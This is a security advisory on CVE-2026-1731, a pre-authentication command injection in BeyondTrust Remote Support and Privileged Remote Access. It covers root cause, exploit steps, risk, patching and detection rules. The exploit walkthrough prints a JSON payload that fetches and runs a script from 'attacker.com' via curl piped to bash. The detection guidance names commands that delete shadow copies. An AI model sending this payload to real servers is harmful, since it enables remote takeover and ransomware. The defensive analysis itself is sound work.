CVE-2026-1731: BeyondTrust Pre-Auth RCE Exposed

Exploit Chain Diagram

1. Recon
Shodan / Masscan
Port 443 scan
2. WebSocket Connect
/nw endpoint
No auth required
3. Payload Injection
Malicious JSON + Bash eval
remoteVersion field
4. RCE
SYSTEM/root shell
Arbitrary command exec
5. Impact
Ransomware / Exfil / Persistence
Credential dump, lateral move
Exploit & Risk Highlights

• Critical pre-auth RCE in BeyondTrust RS/PRA – unauthenticated OS command injection via WebSocket /nw endpoint
• Mass exploitation confirmed within 24 hours of PoC release (Feb 10, 2026) – public exploits on GitHub/Rapid7
• CISA KEV added Feb 13; federal deadline Feb 16 already elapsed – high risk for exposed on-prem instances
• Enables full SYSTEM/root compromise – ransomware entry, data exfiltration, persistence
• Patch immediately (RS ≥25.3.2); restrict /nw access; monitor Sysmon for suspicious WebSocket/command execution

1. Vulnerability Overview

CVE-2026-1731 is a critical pre-authentication OS command injection vulnerability in BeyondTrust Remote Support (RS) ≤25.3.1 and Privileged Remote Access (PRA) ≤24.3.4. Disclosed February 6, 2026, and added to CISA KEV February 13, it allows unauthenticated remote code execution via crafted WebSocket messages to the /nw endpoint. Exploitation began within hours of disclosure, with public PoCs accelerating mass scanning and attacks. This flaw bypasses authentication entirely, enabling arbitrary command execution as the service account (often SYSTEM on Windows or root on Linux). Impact is severe for organizations using BeyondTrust for privileged remote access — attackers gain full system control on exposed instances, often leading to ransomware deployment or data exfiltration. Patch availability is immediate for cloud instances and on-prem (≥25.3.2 RS / equivalent PRA). Federal agencies missed the February 16 deadline. This article dissects the root cause, exploit chain, affected systems, and mitigations in depth.

2. Technical Breakdown

Root Cause Analysis:

The vulnerability resides in the WebSocket handling logic of the BeyondTrust Relay service, specifically the /nw (Network Relay) endpoint. The thin-scc-wrapper script performs unsafe Bash arithmetic evaluation on user-supplied input without sanitization or authentication enforcement in vulnerable configurations. Key defects include:

  • Unauthenticated WebSocket connections to /nw are permitted in certain self-hosted deployments, bypassing session validation entirely.
  • Incoming JSON payloads are deserialized without origin or session checks, allowing arbitrary fields such as ‘remoteVersion’ or ‘command’ to be processed.
  • User-supplied values are passed directly into Bash arithmetic expansion ($(…)) or equivalent system calls, enabling command injection via crafted arithmetic expressions (e.g., a[$(malicious_command)]).
  • Legacy code paths retained from earlier PRA versions lack modern hardening techniques (no command allow-lists, no input escaping/quoting, no least-privilege execution sandbox).
  • No rate limiting, anomaly detection, or logging of suspicious payload patterns on the relay endpoint, permitting rapid, high-volume exploitation attempts.

Pseudocode representation of the vulnerable logic (simplified from reverse-engineered wrapper):

# Vulnerable thin-scc-wrapper excerpt (pseudocode)
remote_version = json_payload.get('remoteVersion', '')
if is_arithmetic_expression(remote_version):
    try:
        # Unsafe Bash arithmetic evaluation
        result = subprocess.check_output(f"echo $(( {remote_version} ))", shell=True, text=True)
        execute_system_command(result.strip())  # leads to RCE
    except Exception as e:
        log_error(e)  # minimal logging, no alert

This is a classic command injection primitive amplified by the lack of authentication, making it far more severe than post-auth injection flaws seen in prior remote access vulnerabilities (e.g., Ivanti Pulse Secure CVE-2023-46805). The vulnerability was introduced or retained during a legacy code migration in RS 25.x series, highlighting the risks of unhardened code reuse in security-critical products.

Attack Vector: Remote – No authentication required, no user interaction needed. Exploitation occurs over the network via a single crafted WebSocket message to the /nw endpoint.

Impact: Full Remote Code Execution (RCE) as the relay service account (SYSTEM/root). Post-exploitation outcomes include credential dumping (e.g., LSASS memory access or SAM dump), lateral movement via SMB/RDP, ransomware deployment (Ransoomed, Warlock variants), data exfiltration to Mega.nz/Tor endpoints, or establishment of persistent backdoors for espionage or extortion. Scope changed due to ability to affect internal networks from an external entry point.

Exploit Mechanics Summary:

  1. Reconnaissance: Attacker identifies exposed BeyondTrust instances using Shodan, Censys, Masscan, or custom scanners targeting port 443 (HTTPS) or non-standard relay ports. Fingerprinting via HTTP headers (Server: BeyondTrust), certificate CNs, or response banners confirms vulnerable versions (≤25.3.1 RS / ≤24.3.4 PRA).
  2. Connection Establishment: Opens unauthenticated WebSocket connection to wss://target/nw (no auth challenge in vulnerable configs).
  3. Payload Crafting & Delivery: Sends malicious JSON payload exploiting Bash arithmetic eval, e.g.:
    {
      "type": "remoteVersion",
      "value": "1 + $(whoami; curl -s http://attacker.com/payload.sh | bash)"
    }
    
    The Bash $(…) substitution executes the command during arithmetic evaluation.
  4. Command Execution: Backend deserializes payload and executes arbitrary OS commands in the relay service context (SYSTEM/root privileges), granting immediate shell access.
  5. Post-Exploitation: Attacker enumerates environment (whoami, netstat, ipconfig), dumps credentials (lsass.exe memory access or SAM dump), moves laterally via SMB/RDP, deploys ransomware (e.g., Ransoomed, Warlock), or exfiltrates sensitive data. Persistence achieved via scheduled tasks, WMI subscriptions, or registry run keys.

Public proof-of-concept exploits surfaced on GitHub and Rapid7 repositories within 12 hours of disclosure, including Metasploit modules, Python one-liners, and curl-based exploit scripts. Mass scanning from bulletproof hosting ranges (e.g., PROSPERO OOO AS200593) was observed by GreyNoise and watchTowr within 24 hours, accelerating adoption by ransomware affiliates and opportunistic actors.

3. Risk Assessment

Exposure Scope:

Shodan and Censys scans in mid-February 2026 identified thousands of internet-facing BeyondTrust RS/PRA consoles vulnerable to CVE-2026-1731. Highest exposure in managed service providers (MSPs), security operations centers (SOCs), government contractors, and enterprises using BeyondTrust for privileged remote support. Cloud-hosted instances were automatically patched by the vendor; self-hosted/on-prem deployments required manual intervention and constituted the primary attack surface. Organizations without network segmentation or IP allow-listing faced extreme risk of compromise within minutes of exposure. The vulnerability’s pre-auth nature means even air-gapped or segmented environments remain at risk if the relay service is internet-reachable.

Industry Impact:

Severe and cascading. Early exploitation vectors enabled ransomware initial access (Ransoomed, Warlock, Qilin variants), leading to data exfiltration, extortion, and business disruption. Supply-chain risk is elevated for organizations relying on MSPs or shared BeyondTrust infrastructure. Financial, healthcare, and government sectors experienced secondary impacts from downstream compromise, including regulatory violations (GDPR, DORA, HIPAA) and reputational damage. The rapid exploitation cycle compressed incident response windows, forcing organizations to react rather than prevent.

Likelihood of Mass Exploitation:

Very High. The combination of pre-authentication access, trivial exploitation (single WebSocket message), and public PoCs drove rapid adoption. GreyNoise reported thousands of scan attempts within 48 hours of PoC release. Ransomware affiliates integrated the exploit into automated toolkits, further compressing the exploitation window to hours. Threat intelligence feeds showed consistent use in ransomware campaigns targeting remote access footholds, with follow-on payloads including credential dumpers and lateral movement tools.

Threat Actor Interest:

High across multiple actor types. Financially motivated ransomware groups (Qilin, TridentLocker, Ransoomed) used the flaw for reliable initial access due to its low complexity and high success rate. Nation-state actors (e.g., Chinese-nexus groups like KAMACITE) showed interest in persistence on privileged remote endpoints for long-term espionage or disruption. The vulnerability’s reliability, low detection footprint, and broad applicability make it attractive to both opportunistic cybercriminals and advanced persistent threats seeking footholds in high-value networks.

4. Mitigation & Recommendations

Patch Availability:

Immediate and comprehensive. BeyondTrust released fixes for cloud instances automatically (February 6–7, 2026) and provided on-prem/self-hosted updates (RS ≥25.3.2, PRA equivalents). All customers should verify current version and apply patches without delay. Federal agencies missed the CISA KEV remediation deadline of February 16, 2026, highlighting the need for proactive patching beyond compliance requirements. Organizations should treat this as an emergency update, prioritizing internet-facing and high-privilege systems.

Temporary Workarounds:

  • Restrict inbound access to the /nw endpoint via firewall rules (IP allow-listing or geo-blocking to trusted networks only).
  • Disable WebSocket relay functionality if not required for business operations.
  • Monitor relay service logs for anomalous WebSocket connections or command execution patterns (e.g., grep for “eval” or “os.system” in logs).
  • Implement network segmentation to isolate BeyondTrust servers from internal networks and critical assets.
  • Reduce internet exposure by placing instances behind VPN, bastion hosts, or zero-trust access controls.
  • Enable logging of all WebSocket connections and review for unexpected source IPs or payload patterns.

Detection Guidance:

  • Sysmon: Event ID 1 (process creation with suspicious parent/command line containing “whoami”, “powershell -enc”, “cmd /c”), Event ID 3 (unexpected outbound connections from relay service), Event ID 10 (LSASS access if follow-on credential dumping occurs).
  • Windows Security: Event ID 4688 (process creation logging), Event ID 5145 (share access anomalies), Event ID 4624/4625 (unusual logons from relay context).
  • Network: Alert on unusual WebSocket traffic to /nw endpoint or non-standard ports; monitor for spikes in outbound 443 connections from relay servers to known C2/malware download locations.
  • Behavioral: UEBA rules for mass file renames, shadow copy deletion (vssadmin delete shadows /all /quiet or wmic shadowcopy delete), or high disk I/O from single processes (ransomware indicators).
  • SIEM Example Rules (pseudo-SPL):
    • index=windows sourcetype=”WinEventLog:Microsoft-Windows-Sysmon/Operational” EventCode=1 CommandLine=”*whoami*” OR “*powershell -enc*” ParentImage=”*beyondtrust*”
    • index=network sourcetype=”pan:traffic” dest_port=443 dest_ip IN (known_c2) src_ip IN (beyondtrust_servers)
    • index=firewall action=deny src_ip=* dest_port=443 dest_ip=* | search “WebSocket” OR “/nw”

Strategic Response Considerations:

  • Prioritize patching and exposure reduction for all internet-facing remote access tools — BeyondTrust, Ivanti, SimpleHelp, Net Monitor, and similar platforms remain high-value targets for ransomware and nation-state actors.
  • Conduct comprehensive vulnerability scanning (external and internal) to identify exposed instances; use Shodan, Censys, or commercial tools for continuous monitoring and alerting on new exposures.
  • Reassess privileged access management strategy — evaluate alternatives to BeyondTrust (e.g., zero-trust remote access, just-in-time access) or implement additional hardening layers (MFA, session recording, command auditing).
  • Proactively hunt for indicators of compromise in logs (WebSocket anomalies, unexpected OS commands, anomalous outbound traffic) using threat hunting playbooks tailored to remote access RCE.
  • Prepare incident response playbooks specifically for remote access compromise — assume relay server breach and plan for credential rotation, network isolation, forensic preservation, and ransomware negotiation avoidance.
  • Integrate threat intelligence feeds (GreyNoise, Rapid7, CISA alerts) for early warning on new PoCs or scanner campaigns targeting remote access endpoints.
  • Conduct regular red-team exercises simulating pre-auth RCE on remote access tools to validate detection and response capabilities.

© 2026 ByteVanguard • Independent Cyber Threat Intelligence

Intelligence over headlines. Signal over noise.

Stay Connected

Report Intelligence
© 2026 ByteVanguard. Built for security professionals.